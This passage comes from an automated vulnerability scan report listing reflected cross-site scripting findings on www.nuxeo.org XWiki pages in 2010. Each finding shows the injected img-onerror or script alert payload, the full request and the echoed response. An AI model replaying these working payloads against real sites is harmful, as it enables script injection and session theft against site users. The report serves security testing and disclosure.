<a href="http://www.nuxeo.org/xwiki/bin/export/Mainf83de%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5f41d66ee78/WebHome?format=xar&amp;name=Mainf83de"><img src=a onerror=alert(1)>5f41d66ee78.WebHome&amp;pages=Mainf83de">
...[SNIP]...

1.22. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6 was submitted in the REST URL parameter 4. This input was echoed as a777f<img src=a onerror=alert(1)>bb226e90ef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Maina777f<img%20src%3da%20onerror%3dalert(1)>bb226e90ef6/WebHome HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:54 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12792
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina777f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebb226e90ef6/">Maina777f<img src=a onerror=alert(1)>bb226e90ef6</a>
...[SNIP]...

1.23. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 was submitted in the REST URL parameter 5. This input was echoed as c8f16"><img src=a onerror=alert(1)>124352d5031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Main/WebHomec8f16"><img%20src%3da%20onerror%3dalert(1)>124352d5031 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12863
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebHomec8f16%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E124352d5031?format=xar&amp;name=Main.WebHomec8f16"><img src=a onerror=alert(1)>124352d5031&amp;pages=Main.WebHomec8f16">
...[SNIP]...

1.24. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac was submitted in the REST URL parameter 5. This input was echoed as f6f73<img src=a onerror=alert(1)>f496e7fa5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Main/WebHomef6f73<img%20src%3da%20onerror%3dalert(1)>f496e7fa5ac HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12801
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebHomef6f73%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef496e7fa5ac'>WebHomef6f73<img src=a onerror=alert(1)>f496e7fa5ac</a>
...[SNIP]...

1.25. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba was submitted in the REST URL parameter 4. This input was echoed as e3ebd<img src=a onerror=alert(1)>55b90c707ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skinse3ebd<img%20src%3da%20onerror%3dalert(1)>55b90c707ba/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12813
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/skinse3ebd%3Cimg+src%3Da+onerror%3Dalert%281%29%3E55b90c707ba/">skinse3ebd<img src=a onerror=alert(1)>55b90c707ba</a>
...[SNIP]...

1.26. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d was submitted in the REST URL parameter 4. This input was echoed as fef32"><img src=a onerror=alert(1)>d71e73a5f1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skinsfef32"><img%20src%3da%20onerror%3dalert(1)>d71e73a5f1d/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12879
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skinsfef32%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed71e73a5f1d/toucan?format=xar&amp;name=skinsfef32"><img src=a onerror=alert(1)>d71e73a5f1d.toucan&amp;pages=skinsfef32">
...[SNIP]...

1.27. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 was submitted in the REST URL parameter 5. This input was echoed as 68a4f"><img src=a onerror=alert(1)>9a7616758c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skins/toucan68a4f"><img%20src%3da%20onerror%3dalert(1)>9a7616758c8 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12863
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan68a4f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9a7616758c8?format=xar&amp;name=skins.toucan68a4f"><img src=a onerror=alert(1)>9a7616758c8&amp;pages=skins.toucan68a4f">
...[SNIP]...

1.28. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 was submitted in the REST URL parameter 5. This input was echoed as 41c04<img src=a onerror=alert(1)>a6287896c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/skins/toucan41c04<img%20src%3da%20onerror%3dalert(1)>a6287896c27 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12801
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucan41c04%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea6287896c27'>toucan41c04<img src=a onerror=alert(1)>a6287896c27</a>
...[SNIP]...

1.29. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/login/XWiki/XWikiLogin

Issue detail

The value of the xredirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e135"><script>alert(1)</script>f943fd1f5a1 was submitted in the xredirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xwiki/bin/login/XWiki/XWikiLogin?xredirect=http%3A%2F%2Fwww.nuxeo.org%2Fxwiki%2Fbin%2Fview%2FMain%2F3e135"><script>alert(1)</script>f943fd1f5a1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 401 Unauthorized
Date: Mon, 15 Nov 2010 14:17:10 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13229
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<input type="hidden" name="xredirect" value="http://www.nuxeo.org/xwiki/bin/view/Main/3e135"><script>alert(1)</script>f943fd1f5a1" />
...[SNIP]...

1.30. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c was submitted in the REST URL parameter 4. This input was echoed as 458d1<img src=a onerror=alert(1)>8dd7e8dd01c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki458d1<img%20src%3da%20onerror%3dalert(1)>8dd7e8dd01c/Register HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13999
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki458d1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8dd7e8dd01c/">XWiki458d1<img src=a onerror=alert(1)>8dd7e8dd01c</a>
...[SNIP]...

1.31. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec was submitted in the REST URL parameter 4. This input was echoed as 63e7a"><img src=a onerror=alert(1)>c726e3e58ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki63e7a"><img%20src%3da%20onerror%3dalert(1)>c726e3e58ec/Register HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 14065
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki63e7a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec726e3e58ec/Register?format=xar&amp;name=XWiki63e7a"><img src=a onerror=alert(1)>c726e3e58ec.Register&amp;pages=XWiki63e7a">
...[SNIP]...

1.32. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b was submitted in the REST URL parameter 5. This input was echoed as 7501a"><img src=a onerror=alert(1)>a1cd787231b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki/Register7501a"><img%20src%3da%20onerror%3dalert(1)>a1cd787231b HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:19:53 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 14049
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Register7501a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea1cd787231b?format=xar&amp;name=XWiki.Register7501a"><img src=a onerror=alert(1)>a1cd787231b&amp;pages=XWiki.Register7501a">
...[SNIP]...

1.33. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/register/XWiki/Register

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d was submitted in the REST URL parameter 5. This input was echoed as ba825<img src=a onerror=alert(1)>650a8396e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/register/XWiki/Registerba825<img%20src%3da%20onerror%3dalert(1)>650a8396e8d HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:20:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13987
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Registerba825%3Cimg+src%3Da+onerror%3Dalert%281%29%3E650a8396e8d'>Registerba825<img src=a onerror=alert(1)>650a8396e8d</a>
...[SNIP]...

1.34. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee was submitted in the REST URL parameter 4. This input was echoed as 8dc28<img src=a onerror=alert(1)>e5ffb44f0ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ8dc28<img%20src%3da%20onerror%3dalert(1)>e5ffb44f0ee/DownloadingNuxeoSources HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13066
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
